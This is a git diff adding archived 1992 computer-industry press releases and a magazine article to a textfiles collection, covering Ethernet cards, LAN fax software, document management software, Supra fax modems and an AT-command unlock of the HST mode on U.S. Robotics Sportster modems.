file mode 100644 index 00000000..51e5193d --- /dev/null +++ b/textfiles.com/computers/PRESSRELEASE/smc.txt @@ -0,0 +1,90 @@ +Retail prices on SMC's most popular 8- and 16-bit Ethernet network +interface cards have been reduced 20 to 35 per cent according to an +announcement made today by the company. At the same time, SMC introduced +both new and enhanced Elite Series Ethernet adapter cards featuring +increased performance, reduced size and easier installation. The new +boards expand the SMC EtherCard PLUS Elite adapter card line. + +The significant price reductions on SMC Ethernet cards became effective +February 1,1992. According to Geof Karlin, SMC vice president of +marketing, the price drops reflect a major benefit of SMC's ability to +manufacture its own Ethernet chipset and bus interface LSI. "Our control +of silicon integration allows us to pass along manufacturing cost +advantages to our customers. This new, low pricing reflects SMC's +commitment to remain the Ethernet price/performance leader." + +The five new EliteSeries boards from SMC consist of an 8-bit 10BASE-T; two +16-bit Micro Channel cards -- one 10BASE-T and one coax; and two +high-performance EISA adapters that feature two direct interfaces to +twisted pair or thin coax wiring via on-board transceivers, and offer an +alternative connection to a variety of media through an AUI port. The +three enhanced EliteSeries boards are all 16-bit adapters -- one 10BASE-T, +one coax and a combination 10BASE-T/coax version. + +The new and upgraded boards all feature higher levels of silicon +integration for both increased reliability and ease of installation, and +are 20% smaller than the previous generation boards they replace. + +"With the introduction of these new boards, we extend our line of Elite +board offerings," said Karlin. "Further integration of our LSI and +elimination of jumpers have allowed us to reduce space requirements on the +boards while increasing their reliability and making them easy to +configure. We expect these new cards to be as popular as the rest of the +EliteSeries line." + +SMC EtherCard PLUS Elite boards are well-known for their outstanding +performance and quality, and easy installation via two preconfigured +jumper settings, or SMC's EZSETUP software configuration program. They +offer the broadest driver support in the LAN industry through SMC's +SuperDisk and third-party vendors. + +SMC is making its new EtherCard PLUS Elite boards available in convenient, +easy-to-carry 6-packs with even more economical per-board retail prices - +some as low as $165. This is equivalent to buying five boards, and getting +the sixth free. Elite 6-packs will begin shipping in February, according +to the company. + +SMC (NASD:SMSC) is one of the world's largest suppliers of PC LAN system +products. The company is a major designer, manufacturer and marketer of +10BASE-T/twisted pair, coax and fiber network interface cards, +concentrators and network management products for the Ethernet and ARCNET +markets. SMC currently has a worldwide installed base of over 3.5 million +nodes. +-------------------------------------------------------- +After announcing major retail price reductions on its Ethernet adapter +cards, SMC said that five of its most popular boards will be available in +6-packs at even lower prices beginning this month. + +SMC's 8-bit and 16-bit 10BASE-T and coax, as well as their 16-bit +combination boards, are all available in the new packaging at a per-board +price that is 20% off list, according to the company. All the boards are +part of the SMC EliteSeries family of Ethernet adapter cards. + +"Resellers want to buy in volume whenever possible, so we're offering Elite +Ethernet boards in a package that meets that need," said Kristine Stewart, +SMC's director of channel marketing. + +The new boxes, complete with carrying handle, began shipping to +distributors this month. Stewart said SMC is alerting the reseller +community about the new packaging through what the company calls the Elite +Treat direct mail campaign which features one of the 6-packs filled with +gourmet popcorn and promotional materials. + +"We shipped over 16,000 of these Elite Treat boxes worldwide. It's +certainly the best tasting direct mail campaign we've ever had, and should +attract quite a bit of attention," said Stewart. +-------------------------------------------------------- +For more information about SMC or the name of their nearest reseller, +contact SMC at 80 Arkay Drive, Hauppauge, NY 11788;1-800-SMC4-YOU in the +U.S., 1-800-8334-SMC in Canada, or (516) 273-3100, ext. 5317 elsewhere. + + +---------------------------------------------------------------+ + | From the America On-Line & PC-Link New Product Info Services | + +===============================================================+ + | This information was processed with OmniPage Professional OCR | + | software (from Caere Corp) & a Canon IX-30 scanner from data | + | provided by the above mentioned company. For additional info, | + | contact the company at the address or phone# indicated above. | + | All submissions for this service should be addressed to | + | BAKER ENTERPRISES, 20 Ferro Drive, Sewell, NJ 08080 U.S.A. | + +---------------------------------------------------------------+ diff --git a/textfiles.com/computers/PRESSRELEASE/sofnet.txt b/textfiles.com/computers/PRESSRELEASE/sofnet.txt new file mode 100644 index 00000000..5cf68fbb --- /dev/null +++ b/textfiles.com/computers/PRESSRELEASE/sofnet.txt @@ -0,0 +1,216 @@ +Atlanta, GA, February 12, 1992 - LAN users can now reap the benefits of PC +fax technology without fear of incompatibility or obsolescence with +ShareFax 2.5, which started shipping February 11. + +ShareFax 2.5 is the first software to enable DOS and Windows PCs to be +non-dedicated fax servers which work with any LAN operating system running +on ethernet or arcnet cards, and with virtually all faxboards and fax +modems. + +ShareFax 2.5 gives organizations a valuable LAN fax solution while the +industry struggles to define universally acceptable technology standards. +Its ability to run in a nondedicated fashion regardless of LAN environment +or fax device clearly distinguishes ShareFax 2.5 from competitors, +according to SofNet, its Atlanta, GA-based developer. + +SotNet simultaneously addresses the peer-to-peer and small business LAN +markets with new two- and eight-user versions of ShareFax for $149.00 and +$399.00 respectively. This is ideal for companies that spend less than +$500 for a LAN such as LANtastic or NetWare Lite, but who do not want to +buy a fax system that costs more than their LAN. + +Users can load both the Windows and DOS versions of ShareFax 2.5 on the +same LAN so Windows and DOS PCs on that LAN can share the fax server. +ShareFax 2.' runs on any LAN operating system that allows its users to +share a directory. + +ShareFax 2.5's unlimited user version enables any LAN-based PC with a fax +device to be the fax server for however many PCs are on the LAN. It runs +in the background so the server can be a non-dedicated PC which executes +other computing tasks. This is more economical than tying up a PC just for +faxing, or buying a stand-alone fax server hardware system. + +A new ShareFax 2.5 feature enables it to support all Class I and Class 2 +fax modems, which represent 95% of the fax modems on the market. This, +along with its ability to support the Hayes-JT Fax modem, +Intel/CAS-compatible fax boards and most proprietary boards, protects +organizations from the adverse effects of fax technology changes. + +ShareFax 2.5 installs automatically, so set up only takes minutes. The DOS +version has new graphical features and a streamlined command structure +which makes it easier to use. Like its Windows' counterpart, the DOS +version enables documents to fax exactly as they appear on the screen, +whereas some PC fax systems transmit text without fonts or other +graphics. + +ShareFax 2.5's command structure is designed so both DOS and Windows users +can fax from their PCs as easily as they print a software document. +ShareFax 2.5 automatically executes the complex software procedures +necessary to communicate with network fax devices. + +Another key new feature enables ShareFax 2.5 users to view, route and print +incoming faxes. ShareFax 2.5 also includes a status log to monitor +out-going and in-coming faxes, multiple phone books for storing fax +numbers and quick dialing, transmission scheduling to send faxes at +optimum times and the ability to fax multiple files to multiple +destinations. + +ShareFax 2.5 for DOS runs on any 8088 through 80486 IBM PC or 100% +compatible with DOS 3.0 or higher. It requires 128K RAM to run in the +foreground, and 18K as a TSR, but users should have 640K total RAM to +allow for their fax board or modem software's memory requirements. The +ShareFax 2.5 Windows version requires Windows 3.0. + +The suggested retail price of unlimited-user version for Windows is +$995.00, and $795 for DOS-only. Users of the limited versions can call +SofNet with their credit card and special ID number to receive a code +which they use to upgrade to additional workstations ($30.00 each for DOS, +$35.00 each for Windows), or to ShareFax's unlimited-user version. + +General Overview - ShareFax 2.5 + +ShareFax 2.5 enables any DOS or Windows PC on a LAN to be a non-dedicated +fax server for the other PCs on the network. ShareFax supports an +unlimited number of users and operates with any LAN operating system which +allows all of the network users to share the same file server directory. +The new 2.5 version is compatible with Class land Class 2 modems, as well +as Intel/CAS, Hayes JT and other proprietary fax devices, which +collectively represent over 95% of the PC fax devices currently on the +market.. + +Besides giving organizations the flexibility to do network faxing from any +LAN environment and with virtually any network fax system, developer +SofNet streamlined ShareFax's operation to make it easier to use. They +also designed 2-user and 8-user limited versions to better meet the needs +of small peer-to-peer LAN users. Organizations can buy either a DOS-only +version, or a DOS/Windows combination if they have DOS and Windows PCs on +the same LAN. + +ShareFax 2.5 consists of two components. + +The workstation module (MultiFax and XFax for DOS, FaxIt for Windows) picks +up the document(s) to be faxed, automatically converts them to the file +format required by fax devices, then stores them in the shared directory. +Both MultiFax and FaxIt use graphical interfaces, they enable users to +create an unlimited number of "phone books" for storing names and fax +numbers, and they send faxes to multiple destinations. MultiFax also can +fax multiple files. XFax is a utility that uses DOS line commands to do +the same thing as MultiFax. Many experienced DOS users prefer line +commands to graphical interfaces. + +The fax server module runs from the LAN PC on which the faxboard or fax +modem and its software is installed. This portion of ShareFax searches the +shared directory every 2 - 5 seconds for faxes, picks up outbound faxes +and uses one of its three fax drivers designed respectively to communicate +with Intel/CAS, Hayes JT or Class 1 and Class 2 fax devices. The server +portion also picks up incoming faxes and sends them to a LAN administrator +directory located on the server. + +ShareFax 2.5 - easy installation and set up + +Network administrators must be sure all of the LAN PCs, including the one +designated as the fax server, can refer to the shared directory with the +same drive reference and path (e.g. F:\FAXOUT). The LAN PCs must also be +able to create, delete, read from and write to files on this shared +directory. The shared directory will typically be found on the file server +of serverbased LANs. On peer-to-peer LANs, the shared directory can be on +any of the attached PCs. + +A simple "INSTALL" command installs ShareFax's fax server portion on the PC +fax server's hard drive. LAN administrators place MultiFax and XFax on the +shared directory, then create the directories and batch files needed to +run MultiFax as a TSR (Terminate but Stay Resident) or a DOS line +command-driven program. XFax is set up the same way. FaxIt can only be +loaded from ShareFax's Windows disk directly onto each Windows PCs' hard +drives. + +Faxing as easy as printing documents + +MultiFax gives users several graphical formats, including push buttons, +check boxes and radio buttons, to guide them through the process of +sending faxes, checking the fax log for the status of in- and outbound +faxes, creating and using phone books and using the print capture feature. +FaxIt uses the standard Windows graphical features. + +Users access MultiFax from the shared directory through their PCs. The +easiest fax procedure is to set MultiFax to run as a TSR, and turn on its +Print Capture feature. When users are ready to fax, they set the software +application they are running to print to an HP LaserJet printer on LPT3 +(the printer port option that people rarely use). The "Print" command +automatically sends the document to MultiFax in HP's .PCL format. When the +document finishes printing, MultiFax pops up to ask users if they want to +print more files. Users can send as many documents to MultiFax as they +want in this manner. + +When users finish printing whatever is to be faxed, MultiFax walks them +through the process of creating cover sheets, determining destinations and +the date and time when faxes should be sent. Hitting the "Send Fax" +command tells MultiFax to take over the faxing process and users can go on +with other work. MultiFax then automatically converts the documents from +.PCL to .PCX format (the format required by all fax devices to be able to +send files) and sends them to the shared directory, where the ShareFax +server module picks the files up and sends them out as soon as possible or +at user-designated times. + +Another procedure users can employ is to turn off Print Capture, but still +run MultiFax as a TSR. When they are ready to fax, users pop up MultiFax, +turn on Print Capture, exit MultiFax, set their document to print to an HP +Laser printer on LPTl(which is where most documents are already set to +print) and hit the "Print" command. The rest of the fax procedure is the +same as with the first option. LAN administrators can determine which +option they want based on the particular needs and skills of their users. + +A third faxing option is to convert files to ASCII or .PCX format (if the +particular application software can do so) and store these files where +users can pick them up with MultiFax at a later time. This is valuable +because users can create documents they send regularly, such as sales +literature, and fax them quickly without having to exit documents to keep +re-entering the commonly faxed documents. However, converting documents to +ASCII format strips them of their graphics and font settings. + +XFax does all of the MultiFax faxing operations through line commands at +the DOS prompt. The ability to specify each ShareFax parameters gives +users greater flexibility in how they use the program. Experienced users +can set up batch files and software shells to use ShareFax in manner most +comfortable to their individual tastes. SofNet provides several prewritten +batch files to further facilitate XFax's use. + +FaxIt, the ShareFax Windows module is even simpler to use than MultiFax. +During installation, users use a command to designate a FaxIt on ShareFax +option be part of Windows' printer setup dialog. When users want to fax a +document, they select the Printer Setup command from any Windows +application, click on FaxIt ShareFax, then print the document as they +normally would. + +FaxIt then works the same as MultiFax, walking users through the various +fax set up options, automatically converting the files to the proper +format with graphics and fonts intact, and sending them to the shared +directory (which is the same directory DOS users access). However, FaxIt +cannot not send multiple files at one time, or send ASCII and .PCX files. + +ShareFax DOS users can create and store any number of custom fax cover +pages, and both DOS and Windows users can store logos in files that can be +merged with the cover pages as faxes are sent. + +Incoming faxes are received at the fax server in the Administration +Directory (created during installation). Anyone who is given +"Administrator" rights can review these faxes with MultiFax, XFax or +FaxIt, and route them to the appropriate people. After individual users +receive faxes at their PCs, they have the option to view them, re-route +faxes to any or all other users, or print the faxes to designated printers +on the LAN. Users can also store faxes on their hard drives. + +SofNet +380 Interstate North Parkway, Suite 150, Atlanta, GA 30339 +404-984-8088 + + +---------------------------------------------------------------+ + | From the America On-Line & PC-Link New Product Info Services | + +===============================================================+ + | This information was processed with OmniPage Professional OCR | + | software (from Caere Corp) & a Canon IX-30 scanner from data | + | provided by the above mentioned company. For additional info, | + | contact the company at the address or phone# indicated above. | + | All submissions for this service should be addressed to | + | BAKER ENTERPRISES, 20 Ferro Drive, Sewell, NJ 08080 U.S.A. | + +---------------------------------------------------------------+ diff --git a/textfiles.com/computers/PRESSRELEASE/softsol.txt b/textfiles.com/computers/PRESSRELEASE/softsol.txt new file mode 100644 index 00000000..cf907537 --- /dev/null +++ b/textfiles.com/computers/PRESSRELEASE/softsol.txt @@ -0,0 +1,72 @@ +OREM, Utah--February 21, 1992 SoftSolutions Technology Corporation (STC) +announced today the latest release of their document management software +-- SoftSolutions for DOS, version 3.0. SoftSolutions 3.0 has been enhanced +to provide an all-encompassing approach to document management. Version +3.0 undertakes the management of all enterprisewide documents, regardless +of their source of creation. + +SoftSolutions organizes documents originating from multiple sources (i.e., +PC LANs, UNIX systems, documents stored on Laptops or Notebooks, hardcopy +documents, and documents created from the use of SoftSolution's Portable +Mode when the network is down), and creates a comprehensive depository of +accessible information. + +Version 3.0 makes information readily available by providing a balance of +features that meet both the needs of end users and system administrators. +The following enhancements benefit both end users and administrators: +Portable Mode operations, equipped with fully-functioning Profiles and +searching features; completely customizable profile screens; activity +logs; personal worklists; simple management of compound documents; +extensive integration and "launch" facilities for other network +applications; improved document security; and, customizable menu options, +error messages, and help screens. + +Alvin Tedjamulia, Vice President of STC, explains that "SoftSolutions is +the only company currently offering Portable Mode operations, which solves +significant problems encountered by organizations managing documents +created by busy users." SoftSolutions can easily coordinate the fragmented +flow of information generated by executives who may have created documents +on their home PC, on a laptop while traveling, or in another office. A +dataset, for example, in one office may welcome "guest documents" from a +dataset of another office. SoftSolutions 3.0 manages the entire process, +including status tracking, mass checkin/check-out, and moving documents +and Profiles. Welcoming guest documents or inviting them back to their +home dataset is efficiently coordinated in SoftSolutions 3.0 with a single +request. + +SoftSolutions 3.0 beta users agree that some of the most impressive aspects +of version 3.0 is the comprehensive offering of features and the product +configurability/flexibility. "Users have given valuable input on the +enhancements of SoftSolutions 3.0 and the resulting cooperative effort +with current users has paid off in the most impressive product we have yet +delivered....SoftSolutions 3.0," said Kenneth W. Duncan, President of +STC. + +SoftSolutions 3.0 fully supports SoftSolutions Image Manager and +SoftSolutions Intelligent Search. SoftSolutions for Windows will have the +same functionality as the DOS version and will be available second quarter +of 1992. + +Memory requirements for SoftSolutions 3.0 are 640 Kb on the PC. A Server +Enhancement Module (SEM) providing true client/server computing, exists +for NetWare 3.1x, IBM AIX, Digital Ultrix, Data General UX, SUN/OS, SCO +UNIX, and Interactive UNIX. + +SoftSolutions 3.0 will ship the end of February. SoftSolutions 3.0 sells +for $495.00 per File Server, $295.00 per additional station, and $1,995.00 +for the Server Enhancement Module. + +SoftSolutions Technology Corp +ParkView Plaza, 625 South State St, Orem, UT 84058 +801-226-6000 + + +---------------------------------------------------------------+ + | From the America On-Line & PC-Link New Product Info Services | + +===============================================================+ + | This information was processed with OmniPage Professional OCR | + | software (from Caere Corp) & a Canon IX-30 scanner from data | + | provided by the above mentioned company. For additional info, | + | contact the company at the address or phone# indicated above. | + | All submissions for this service should be addressed to | + | BAKER ENTERPRISES, 20 Ferro Drive, Sewell, NJ 08080 U.S.A. | + +---------------------------------------------------------------+ diff --git a/textfiles.com/computers/PRESSRELEASE/sport.sav b/textfiles.com/computers/PRESSRELEASE/sport.sav new file mode 100644 index 00000000..8627a101 --- /dev/null +++ b/textfiles.com/computers/PRESSRELEASE/sport.sav @@ -0,0 +1,148 @@ +U.S. ROBOTICS SPORTSTER 14400 - AN UNINTENDED BARGAIN + ----------------------------------------------------- + +Modem manufacturer U.S. Robotics has long offered two classes of modems, the +Courier and the Sportster lines. Courier is the top of the line modem and +within the BBS community is considered one of the top models available. +Sportster modems were typically the ugly little brother - at a much more +economical price. + +The company recently released some new Sportster models that have an allure. +The Sportster 14000 and Sportster 14000 with Fax offer CCITT V.32bis +connections at 14,400 bps, V.42 and V.42bis error correction and compression, +Microcom Networking Protocol (MNP) level 5 compatibility, and in the case of +the fax model - 9600 bps fax. The modems are listed at $519 and $549 +respectively - actually not terribly competitive in the economy class for +modems with this functionality. But Sportsters are almost designed to be +discounted and these are available on the street at around $290 which is +quite competitive. + +The main difference between the Sportster models and the Courier models in +this case is the case. The Courier features a very nice black plastic case +suitable for framing. The Sportster looks like nothing so much as a Radio +Shack home intercomm. You are almost drawn to press a switch, lean over to +speak into it, and ask mom for some juice with this thing. + +But under the hood lies more modem than even U.S. Robotics apparently +intended. The modem motherboard within is not similar to the $1295 Courier +Dual Standard, it actually IS the Courier Dual Standard motherboard. The +Courier Dual Standard of course, in addition to the 14.4kbps V.32bis mode, +features a 16.8kbps proprietary HST (High Speed Technology) mode, a really +nice case, an ASL mode, and a list price of $1295. We obtained data transfer +rates as high as 1885 cps with this top of the line model and reviewed it +very favorably in our October issue. + +The reasons for this are fairly understandable. It is actually cheaper to +manufacture lots of a single motherboard than two different motherboards. And +by repackaging it in a downscale case and disabling a few features, you can +reach an entirely different market segment without a lot of retooling. + +The difference in features is a function of the operating software held in +Read-Only-Memory (ROM) chips on the modem motherboard. But on a large number +of early shipments of the Sportster, the code is still in the ROMs, and can +be reactivated with simple AT commands to give the lightweight Sportster the +16.8Kbps mode that is the most notable function of the Courier power house. +It does not appear to add the ASL function. + +To see if your model supports this, enter the command ATI7 to display the ROM +version. At the bottom of the display, you should see an entry for SUPERVISOR +VER 4.1 or SUPERVISOR VER 4.2. It will also list an OPTIONS V32 entry. If +your ROM indicates SUPERVISOR VER 4.1, you win the USR Sweepstakes. Enter the +command AT GW 03C6,22 GW 05CD,2F and again enter ATI7. The options entry +should now read OPTIONS HST,V32. This means you can now use the 16.8kbps HST +mode. The ATB1 command will turn it on. And if you dial a BBS with a Courier +Dual Standard, you will get a 16800/ARQ connect. + +Currently shipping models of the Sportster have a version 4.2 ROM and the +command doesn't work. Merry Christmas from U.S. Robotics. Rumor has it there +are some very unhappy campers within USR over this marketing faux pas. We +don't get it. So some USR customers got a good deal - that's got to be +terrible PR right? + +Apparently USR is determined to turn it into a negative one way or another. +The company has issued a fairly artless written IMPORTANT WARNING TO BULLETIN +BOARD USERS quoting chapter and verse of U.S. copyright law. We produce the +full text of this warning here: + +"IMPORTANT WARNING TO BULLETIN BOARD USERS: + +It has recently come to our attention that some bulletin board operators and +other third parties have been improperly distributing copyrighted firmware +that will add USR's proprietary "HST" protocol to USR "Sportster" modems +without having to compensate USR for the conversion. Some of these persons +have further been telling customers that if such a conversion is made, it +will not adversely affect the customer's right to warranty service from USR. + +USR has not authorized the dissemination of this firmware. The Company +considers any such attempts to improperly incorporate copyrighted "HST" +features into non-HST modems to be a clear infringement of USR's rights under +Federal Copyright Law. Persons contemplating such action should be aware that +the Copyright Act of 1976 provides stiff remedies for acts of copyright +infringement, including the impounding of all infringing copies, monetary +damages, special statutory damages, costs, attorney fees, and even potential +criminal liability. 17 U.S.C. Secs. 502-506. USR will take whatever steps it +deems necessary to protect its copyright rights. In addition, USR's warranty +will not extend to products that have been tampered with in this manner. + +Also, please note that it has also come to our attention that versions of the +firmware being disseminated contain disguised code ("Trojan Horse") that may +inflict irreparable damage to the hard drive of the computer utilizing the +programs. + +We regret the necessity of having to post this warning. Please understand +that USR has spent considerable time, effort and money to research and +develop the software embodied in its products. Like any manufacturer, we +cannot simply sit back and tolerate attempts to misappropriate our +copyrighted programs in this manner. U.S. Robotics, Inc." + +We haven't been able to locate anything remotely resembling USR firmware +online. If it did exist, it would be a copy of the ROM code in the Dual +Standard ROM and could not conceivably even be run on an 80x86 +microprocessor, much less operate as a Trojan Horse. It would be data that +garage-shop pirates would use to create unauthorized copies of the ROM using +an Electrically Programmable Read Only Memory (EPROM) programming device. +This would be put in the Sportster to convert it to a Courier Dual Standard. +This would certainly be copyright violation, and we cannot condone it in any +form. But it disqualifies itself as a candidate for a Trojan Horse program +quite thoroughly. + +The only file we can find online even remotely relating to this warning is a +tiny 24KB program titled USRPATCH.ZIP. It appears to come from Johan Franzn +of Twilight Garden BBS at 46-8-510-50925 (FidoNet 2:201/258). The program is +apparently authored by "Jeffe and Alex" who credit Henrik Johansson with the +discovery. It appears to simply send the AT command previously described to +the modem from the DOS command line. In this way, you can run the program, +and then your terminal program, and not have to enter the AT command at all +each time you use the modem. + +We are thoroughly confused by U.S. Robotics' warning. And any attempt to talk +to anyone within the company leads to a lot of finger pointing and referral +to other telephone numbers in an essentially endless fashion. First, the +program does nothing more than send the AT commands to the modem and U.S. +Robotics "copyright" to AT commands of any sort is openly questionable. +Secondly, there is nothing we can find wrong with this file, and the question +of a Trojan Horse program appears to be blatantly transparent fear mongering +of the worst sort. In fact, the concept of a software program causing +"irreparable damage to a hard drive mechanism is ludicrous. The most virulent +viruses and most damaging Trojan Horse programs can only damage data on hard +disk drives - not the hard disk drives themselves. This is officially and +totally utter nonsense. It was undoubtedly drafted by a lawyer to the ongoing +chagrin and mortified embarrassment of every technical person within this +fine company. + +We understand their distress. And we'll shed no tears for anyone running +garage shop EPROM mills that might be prosecuted. But technically ridiculous +warning messages do nothing but call into question the credibility of USR +itself. Trying to "scare" users into NOT entering simple commands to make the +modem they bought and paid for more capable doesn't even make sense from a +marketing standpoint. And lost in the confusion is the fact that their "Radio +Shack Intercomm" model is actually a dynamite little modem on its own merits, +at a reasonable price. That a few of the early buyers of this modem got a +good deal, can only work to U.S. Robotics benefit - if they don't work too +hard to turn it into a negative. + +There were rumors of plans within the company to introduce a BBS operator +discount price on this Sportster model of as little as $279 - which would +have been quite exciting. The current imbroglio has probably delayed this +move if indeed those were the plans. U.S. Robotics, Inc. 8100 North McCormick +Blvd., Skokie, IL 60076; (708)982-5010 voice; (708)982-5092 BBS. diff --git a/textfiles.com/computers/PRESSRELEASE/sprasop.txt b/textfiles.com/computers/PRESSRELEASE/sprasop.txt new file mode 100644 index 00000000..6fdc4024 --- /dev/null +++ b/textfiles.com/computers/PRESSRELEASE/sprasop.txt @@ -0,0 +1,125 @@ +[10] From: dgsi!ee.rochester.edu!jerry at Internet-Gateway 2/21/92 5:36PM (6006 +bytes: 119 ln) +To: VRV at cimage_aa_lan +Subject: No Subject Given +------------------------------- Message Contents ------------------------------- +[FILENAME: SPRASOP.TXT] + + SUPRA'S NEW 9600 MODEMS!!! + + Supra will be releasing 2 new 9600 modems - the 9600 Supra FaxModem +v.32 and the 14400 Supra FaxModem v.32bis at a retail price of $299.95 +and $399.95 respectively. The v.32bis will be available in late January +1992 and the v.32 will be available in February 1992. Supra will offer +these two modems at a special price for Sysops. + + Both modems support 300-2400bps (Bell 103/212A, V.21 / 22A&B / 22bis +/ 23), v.32 (9600bps), MNP 2-5/10, V42bis, 9600 send/receive fax +(v.27ter/29), class 1/2 (fax software-fax modem communication standard), +caller ID and voice. (Voice and caller ID can be enabled through low- +cost, user-installable firmware upgrades available mid-1992.) The +v.32bis model adds v.32bis (14400bps) and v.17 (14400 fax). This is all +packaged in Supra's famous small case (1" high x 4.5" wide x 6.5" long). + + The modems will have 4 lights (RD/SD/OH/TR) and a LED display. The +display will show the connection rate, compression protocol, error +correction protocol, etc. in a rotating fashion. + +>>>HOW CAN SUPRA SELL A 9600 MODEM FOR 1/2-1/3 THE PRICE OF + CURRENT MODEMS? + + This year the price of v.32/v.32bis technology will tumble to new +lows. Supra is continuing its proud tradition of being a leader in +using new chipsets to lead the modem industry to a new price point. + +>>>IF SUPRA IS USING A NEW CHIPSET, HOW CAN I BE SURE THAT THE + NEW MODEMS WILL NOT HAVE SOME PROBLEMS WHEN THEY ARE RELEASED? + + Supra is using a new Rockwell chipset which condenses several of +their older chips into 1 chip. Rockwell is the leader in building modem +chipsets. A majority of current 9600 modems are based upon the older +Rockwell v.32 technology. We do not foresee any problems, but if a +problem does occur, Supra is committed to solving it as quickly as +possible. Supra also offers a 30 day Money Back Guarantee for products +that are purchased directly from Supra. + +>>>MY LOCAL USERS USE USR HST MODEMS. WILL I BE ABLE TO + COMMUNICATE AT 9600 BAUD WITH THEM? + + The maximum baud rate you will connect at with a HST modem is 2400. +Depending on the age of the HST modem, you may also get a v42bis data +compression connection. If the user uses the USR Dual Standard modem, +and it is setup correctly, you will connect at a baud rate of 9600 (or +14400 if using v.32bis). We expect that most owners of the HST modems +will be upgrading to v.32 modems. + +>>>I HAVE NEVER HEARD OF SUPRA. HOW RELIABLE ARE THEIR MODEMS? + + Supra Corporation has been providing personal computer users with +high-quality, low-cost peripherals since 1985. In addition to +manufacturing a very successful line of modems, Supra makes a variety of +peripherals for Mac, IBM, and Amiga computers. Supra has excelled +because of its unique combination of quality products, competitive +prices, and excellent customer support. + Supra has a complete line of modems from a standard 2400 modem to a +2400 v.42bis, a 2400 FaxModem, a 9600 FaxModem and a 14400 FaxModem. We +have internal versions of most of these modems for the IBM and Amiga. +As with most of our products, every modem that we manufacture is tested +and burned in on our test machines. + To obtain one of the new modems under this Sysop offer, please +complete the following information and send it to: + Supra Corporation + 7101 SW Supra Dr. + Albany, OR 97321 + ATTN: Sysop Order +or FAX the information to 503-967-2401. + +If you have any questions, please contact either Supra's Sales +Department or the Technical Support Department at: +503-967-2400 (main 8-5pst) +503-967-2401 (Fax) +503-967-2410 (Sales 7-5pst) +800-727-8772 (Sales 7-5pst) +503-967-2440 (Tech Support 9-4pst) +503-967-2444 (BBS, 2 line v32bis) +CompuServe 76004,565 +GEnie SupraTech +Bix SupraCorp +American Online SupraCorp2 + +======================================================================== +SYSOP INFORMATION +BBS Name:________________________ BBS Software:________________ +BBS Phone:_______________________ Type of System:______________ +No. of Phone Lines:______________ Type of Modem used:__________ +No. Calls per Month:_____________ No. of Modems:_______________ +How long in operation:___________ + +ORDER INFORMATION +Date______________ +BILL TO:_________________________________________________________ +Address__________________________________________________________ +City______________ State_____ Zip________ Phone____________ +Contact Name:____________________________________________________ +Circle one of the following: VISA MASTERCARD COD +Card Numbers__________________________ Expiration Date_________ +SHIP TO:_________________________________________________________ +Address__________________________________________________________ +City______________ State_____ Zip________ Phone____________ +Referred by:_____________________________________________________ + +PRODUCT +Model: Price: Quantity: +SupraFAXModem V.32 $199.95 (modem only) _____ +SupraFAXModem V.32bis $249.95 (modem only) _____ +SHIPPING +Route: Price: Quantity: +___ Ground $ 5.00/pc _____ +___ Blue Label $ 8.00/pc _____ +___ Express $12.00/pc _____ + +COMMENTS:_______________________________________________________________ +________________________________________________________________________ +________________________________________________________________________ +________________________________________________________________________ + \ No newline at end of file diff --git a/textfiles.com/computers/PRESSRELEASE/supra96.txt b/textfiles.com/computers/PRESSRELEASE/supra96.txt new file mode 100644 index 00000000..30d9b322 --- /dev/null +++ b/textfiles.com/computers/PRESSRELEASE/supra96.txt @@ -0,0 +1,227 @@ +[11] From: dgsi!ee.rochester.edu!jerry at Internet-Gateway 2/21/92 5:36PM (11258 + bytes: 221 ln) +To: VRV at cimage_aa_lan +Subject: No Subject Given +------------------------------- Message Contents ------------------------------- +[FILENAME: SUPRA96.TXT] + +Supra Breaks Price Barrier With Powerful SupraFAXModems 14,400 bps Fax +and Data (V.32bis) Modem for only $399 + +ALBANY, OR, January 1992 A wide range of features fax, data, voice, +caller ID, unique status display, small case, and very attractive price +all combine to make the new SupraFAXModem family of modems from Supra +Corporation an intriguing new opportunity for computer users. The +SupraFAXModem V.32bis features 14,400 bps fax and data for $399.95 +retail, and the SupraFAXModem V.32 features 9600 bps fax and data for +$299.95 retail. + +On the fax side, both modems feature Class 1 and 2 commands, +compatibility with Group 3 fax machines, and the ability to send and +receive faxes directly from the computer. On the data side, both modems +support communication at speeds ranging from 300 bps to 14,400 bps (9600 +bps for the SupraFAXModem V.32), plus they also support CCITT V.42bis, +MNP 2-5, and MNP 10 data compression and error correction protocols. +When using V.42bis (4:1 compression), the SupraFAXModem V.32bis provides +up to 57,600 bps throughput, and the SupraFAXModem V.32, up to 38,400 +bps throughput. + +Both modems also feature a revolutionary status display, which allows +for an unlimited number of status messages. In a display that looks +similar to a digital clock, the modems presently give the user up to 25 +different messages, conveying things like connection rate and type (FX), +dialing (DI), ringing (RI), and transmission error (TE). This display is +a great advantage compared with most other modems, whose finite number +of indicator lights limit how much information they can convey to the +user. + +All of these features are packed into a case about the size of two decks +of playing cards placed side by side (1" x 4.5" x 6.5") a case that is +half the size of many other V.32 and V.32bis modems. + +All that's needed to use an external SupraModem is a computer +(or terminal) with an RS-232C interface, communications software, and a +cable to connect the modem to the computer. Everything else is +included: the modem, operatorUs manual, quick-reference card, power +adapter, and telephone cable. + +Voice & Caller ID + +SupraFAXModems also support two important features voice and caller ID +that can be enabled through low-cost, user-installable firmware upgrades +available mid-1992. The voice feature allows the modems to send and +receive digitized voice and implement several voice functions. The +modems can compress and uncompress voice data for efficient storage, +generate and recognize touch tones, and sample at various frequencies, +depending on the quality level desired. This feature will be useful for +interactive applications such as voice mail, answering machines, and +digital announcers. Caller ID (where available) allows the number from +which an incoming call was dialed to be displayed on the user's screen +before the call is answered. This will be useful for secure +communications, automatic identification of incoming calls, and +interactive voice applications. + +Innovation & Chip Sets Combine For Killer Pricing At $299.95 and $399.95 +retail, respectively, the SupraFAXModem V.32 and SupraFAXModem V.32bis +are about 1/2 to 1/3 the price of similar modems. Supra is able to +offer these prices because of innovative designs and state-of-the-art +chip sets from Rockwell International. + +"We are very excited about the power we're putting into our customers' +hands, and the outstanding quality we are able to deliver at these very +affordable prices," said John Wiley, President of Supra Corporation. + +In addition to the stand-alone modems, packages that include cables and +software will be available for IBM PC and Macintosh computers. IBM PC +internal models will also be available. + +About Supra Corporation + +Supra Corporation, based in Albany, Oregon, has been providing personal +computer users with high-quality, low-cost peripherals since 1985. The +SupraFAXModems (including the previously announced 9600 bps fax/2400 bps +data SupraFAXModem Plus) are the latest additions to the popular +SupraModem family. Since the original SupraModem 2400 was introduced in +1987, SupraModems have been popular among consumers looking for +excellent value in a reliable modem, and have been recommended by a +variety of sources, from respected PC Magazine and MacUser columnist +John C. 